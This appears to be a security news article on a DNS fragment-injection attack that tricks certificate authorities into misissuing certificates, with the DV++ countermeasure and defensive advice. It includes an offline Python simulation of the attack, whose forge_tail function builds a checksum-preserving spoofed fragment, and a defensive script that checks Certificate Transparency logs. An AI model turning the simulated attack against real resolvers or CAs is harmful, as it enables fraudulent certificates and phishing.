Until this week, the spoofed websites used in phishing attacks usually had a tell. Whether they used a numeral in place of a letter, a similar-but-not-identical spelling or a character from another alphabet, there was always something that gave them away. Even when it was visible only to machines and not to the naked eye, some small difference distinguished a spoofed website from the genuine article.
But attackers may now have a technique that clouds those distinctions. German researchers have found a way to circumvent domain validation, the automated check a certificate authority (CA) performs before issuing a certificate for a domain, and so obtain certificates for websites they do not control. The attack uses DNS poisoning to trick the CA's validation lookups into returning attacker-chosen answers, and has apparently been validated against more than one (unnamed) CA. The resulting certificates are fraudulent only in the sense of having been issued to the wrong party; they are otherwise entirely valid and trusted by every browser, which is what makes the attack dangerous.
The details of the vulnerability are still sketchy. We know about it at all because The Register has seen an early copy of the researchers' report. The researchers plan to present their results in October at the ACM Conference on Computer and Communications Security (CCS) in Toronto, but the report itself is not yet public.
But the implications could be serious. This type of attack would make it significantly easier for attackers to set up convincing spoofed sites, because those sites would present a certificate genuinely tied to the domain being spoofed, issued by a trusted CA and indistinguishable to a browser from one obtained by the real owner.
Here's where it gets tricky. There is nothing inherently wrong with cyber criminals encrypting their own sites: they request legitimate certificates for domains they legitimately own, even if what they do with those sites is anything but legitimate. A domain-validated certificate proves only that the requester controlled the domain when it was issued, not who the requester is. But if attackers can trick CAs into issuing certificates for domains they do not own, that is a game changer.
Justin Hansen, security architect at Venafi, warns that, “The impact of this attack can be quite serious. If an attacker can successfully poison DNS for any domains owned by a targeted organization, they will be able to get a certificate for that organization, and everyone on the internet will trust it. The attacker can then do a whole range of malicious things with that domain.”
The SSL Store blog provides an excellent summary of how such an attack could play out:
“The attack is initiated by a DNS request. The attacker must then craft a correct DNS response before the actual response from the real name-server gets there. The technique actually ensures that the DNS domain validation checks the CA is attempting are performed, but using the attacker’s DNS server instead of the one associated with the targeted domain.”
According to the unpublished report: “The attack depends on getting said DNS responses broken into fragments, and then injecting malicious fragments to fool the CA into handing over the cert to the attacker. The first fragments of the response contain valid DNS challenge-response fields. The inserted fragments can be whatever the miscreant needs to complete the transaction so that he or she gets the cert.”
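To make the quoted description concrete, here is a small simulation of the fragment-injection step, written for this article rather than taken from the researchers' report or from any CA's code. It models IPv4 reassembly (fragments matched on IP ID, first fragment per offset wins) and the UDP checksum in pure Python on constructed data. It assumes sequential IP IDs, a fixed fragment boundary that falls before the answer record's TTL, a one-answer TXT response, and a CA that accepts whatever TXT value its resolver returns; how the attacker gets the name server to fragment and how it predicts the IP ID are outside the model. The names `QNAME`, `forge_tail`, `reassemble`, `run_validation` and the tokens are all invented for the example.

```python
"""Toy model of fragment injection against DNS-based domain validation (added illustration;
nothing touches the network; sequential IP IDs and a fixed fragment boundary are assumed)."""
import base64
import hashlib
import random
import struct

QNAME = "_acme-challenge.example.com"   # constructed validation name
FIRST_FRAG_LEN = 56                     # UDP bytes carried in fragment 1 (multiple of 8)

# --- DNS wire format, minimal: one question, one TXT answer, no name compression ---
def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def txt_rr(name, text, ttl):
    rdata = bytes([len(text)]) + text.encode()
    return encode_name(name) + struct.pack("!HHIH", 16, 1, ttl, len(rdata)) + rdata

def dns_response(txid, qname, answer_rr):
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)   # QR, AA, QDCOUNT=1, ANCOUNT=1
    return header + encode_name(qname) + struct.pack("!HH", 16, 1) + answer_rr

def skip_name(msg, i):
    while msg[i]:
        i += msg[i] + 1
    return i + 1

def parse_txt_answer(msg):
    """Return (txid, txt string) from a one-question, one-TXT-answer response."""
    i = skip_name(msg, skip_name(msg, 12) + 4)   # past question name, QTYPE/QCLASS, owner name
    rdata = msg[i + 10:]                         # after TYPE, CLASS, TTL, RDLENGTH
    return struct.unpack("!H", msg[:2])[0], rdata[1:1 + rdata[0]].decode()

# --- UDP (RFC 768); the constant IPv4 pseudo-header is left out of the checksum for brevity ---
def ones_complement_sum(data):
    data += b"\x00" * (len(data) % 2)
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return s

def udp_datagram(sport, dport, payload):
    header = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    csum = (~ones_complement_sum(header + payload)) & 0xFFFF
    return header[:6] + struct.pack("!H", csum) + payload

# --- IPv4 fragmentation reduced to what reassembly keys on (src/dst/proto assumed fixed) ---
def fragment(ip_id, dgram, first_len=FIRST_FRAG_LEN):
    assert first_len % 8 == 0 and first_len < len(dgram)
    return [{"id": ip_id, "offset": 0, "mf": True, "data": dgram[:first_len]},
            {"id": ip_id, "offset": first_len, "mf": False, "data": dgram[first_len:]}]

def reassemble(cache, frag):
    """Host reassembly cache: match on IP ID only, keep the first fragment seen at an
    offset, release the datagram once a head and a contiguous last fragment exist."""
    entry = cache.setdefault(frag["id"], {})
    entry.setdefault(frag["offset"], frag)
    head = entry.get(0)
    tail = next((f for f in entry.values() if not f["mf"]), None)
    if head and tail and tail["offset"] == len(head["data"]):
        del cache[frag["id"]]
        return head["data"] + tail["data"]
    return None

def forge_tail(real_tail, attacker_token):
    """Attacker's fragment 2: same length as the real tail (the UDP length lives in
    fragment 1), with the low 16 bits of the attacker-chosen TTL set so the ones'
    complement sum, hence the UDP checksum carried in fragment 1, is unchanged."""
    rr = txt_rr(QNAME, attacker_token, ttl=0)
    tail = udp_datagram(53, 53, dns_response(0, QNAME, rr))[FIRST_FRAG_LEN:]
    assert len(tail) == len(real_tail), "spoofed tail must match the real length"
    ttl_lo = len(tail) - (1 + len(attacker_token)) - 2 - 2   # back over RDATA, RDLENGTH, TTL low word
    fix = (ones_complement_sum(real_tail) - ones_complement_sum(tail)) % 0xFFFF
    return tail[:ttl_lo] + struct.pack("!H", fix) + tail[ttl_lo + 2:]

def make_token(key_authorization):
    """dns-01 style value: base64url(SHA-256(key authorization)), unpadded."""
    return base64.urlsafe_b64encode(hashlib.sha256(key_authorization).digest()).decode().rstrip("=")

def server_answer(server, txid, dport):   # victim zone's authoritative server, sequential IP IDs
    server["ip_id"] += 1
    msg = dns_response(txid, QNAME, txt_rr(QNAME, server["token"], ttl=300))
    return fragment(server["ip_id"], udp_datagram(53, dport, msg))

def run_validation(attacker_present=True):
    """Simulate the CA resolver's TXT lookup and report what it accepted."""
    real_token = make_token(b"owner-key-authorization")          # constructed sample values
    attacker_token = make_token(b"attacker-key-authorization")   # the token the CA gave the attacker
    server, ca_cache = {"token": real_token, "ip_id": 0x1000}, {}
    if attacker_present:   # probe for layout and current IP ID, then plant a tail under the next ID
        probe = server_answer(server, txid=0xBEEF, dport=40000)
        reassemble(ca_cache, {"id": probe[0]["id"] + 1, "offset": FIRST_FRAG_LEN, "mf": False,
                              "data": forge_tail(probe[1]["data"], attacker_token)})
    txid, sport = random.getrandbits(16), random.randint(1024, 65535)   # unknown to the attacker
    frags = server_answer(server, txid, sport)
    # A planted tail completes the datagram as soon as the genuine head lands; the genuine tail
    # then arrives to an empty cache entry and is left dangling.
    dgram = reassemble(ca_cache, frags[0]) or reassemble(ca_cache, frags[1])
    rtxid, txt = parse_txt_answer(dgram[8:])
    return {"udp_checksum_ok": ones_complement_sum(dgram) == 0xFFFF,
            "txid_and_port_ok": rtxid == txid and struct.unpack("!H", dgram[2:4])[0] == sport,
            "txt_seen": txt, "real_token": real_token, "attacker_token": attacker_token}
```

The point the simulation makes is where the attacker's leverage sits: everything the CA's resolver checks (transaction ID, destination port, UDP length and checksum) lives in the first fragment, which is genuine, so the resolver accepts the attacker's answer section without any of those checks failing. The IP ID is the only value the attacker has to predict, and the TTL field gives it a free 16-bit knob to keep the checksum intact. For a single resolver, the obvious countermeasure is to not accept fragmented UDP answers at all, by retrying over TCP or keeping responses below the fragmentation threshold.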
What can the industry do to prevent misuse of domain validation? The researchers propose a new domain validation protocol, dubbed DV++, which replaces the single lookup from one CA resolver with a distributed model: validation queries are sent from multiple independent certification agents, and issuance requires a majority of them to agree. An attacker who can poison the DNS seen by one resolver would have to do the same to most of the agents at once.
“To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain.”
Until we know more about this vulnerability and how to prevent its exploitation, organizations should maintain visibility of every certificate in use for every domain and subdomain they own, and should watch for certificates they never requested. Certificate Transparency logs make such issuance visible, although only after the fact, and a certificate reputation service can help flag certificates that are being used for nefarious purposes. A CAA record is not a defense on its own: the CA reads it over the same DNS lookups the attacker is subverting.
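As one concrete form of that visibility, the following added example (not from this article or from any vendor's product) reconciles Certificate Transparency observations against an internal inventory of the certificates an organization actually requested. All data is constructed: the record fields mimic crt.sh's JSON output, but nothing is fetched, and the zone list, issuer names, serials and the function names `in_owned_zone` and `unexpected_certificates` are invented for the example.

```python
"""Reconcile Certificate Transparency observations against an internal certificate inventory.
Added illustration with constructed data; record fields mimic crt.sh's JSON output."""

OWNED_ZONES = {"example.com", "example.net"}            # constructed: zones the organization owns
USUAL_ISSUERS = {"C=US, O=Let's Encrypt, CN=R3"}        # constructed: CAs it normally requests from

# What our own PKI tooling knows it requested, as (issuer, lowercase hex serial): constructed.
INVENTORY = {("C=US, O=Let's Encrypt, CN=R3", "03a1f2c9")}

CT_OBSERVATIONS = [   # constructed log entries
    {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "serial_number": "03A1F2C9",
     "name_value": "example.com\nwww.example.com"},
    {"id": 2, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "serial_number": "04b77e10",
     "name_value": "login.example.com"},
    {"id": 3, "issuer_name": "C=GB, O=Some Other CA, CN=DV Issuer 1", "serial_number": "9c0d",
     "name_value": "*.example.net"},
    {"id": 4, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "serial_number": "1111",
     "name_value": "example.org"},
]

def in_owned_zone(name, zones):
    """True if a certificate name (exact, subdomain or wildcard) falls inside a zone we own."""
    host = name.lower().lstrip("*.")
    return any(host == z or host.endswith("." + z) for z in zones)

def unexpected_certificates(observations, inventory, zones, usual_issuers):
    """Return CT entries that cover our zones but that our inventory cannot account for."""
    findings = []
    for obs in observations:
        names = [n.strip() for n in obs["name_value"].split("\n") if n.strip()]
        ours = [n for n in names if in_owned_zone(n, zones)]
        if not ours:
            continue                                   # someone else's domain
        if (obs["issuer_name"], obs["serial_number"].lower()) in inventory:
            continue                                   # we requested this one
        reason = ("serial not in inventory" if obs["issuer_name"] in usual_issuers
                  else "issuer we never use")
        findings.append({"id": obs["id"], "names": ours,
                         "issuer": obs["issuer_name"], "reason": reason})
    return findings

if __name__ == "__main__":
    for f in unexpected_certificates(CT_OBSERVATIONS, INVENTORY, OWNED_ZONES, USUAL_ISSUERS):
        print(f"CT entry {f['id']}: {', '.join(f['names'])} from {f['issuer']}: {f['reason']}")
```

Because an attacker who beats domain validation can pick any CA, including one you use yourself, the issuer list is only triage; the check that matters is the (issuer, serial) match against what your own tooling requested. Run it against a periodic CT pull for each owned zone and treat every finding as a potential misissuance until the request is accounted for.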
Do you have a complete inventory of all the certificates in your organization?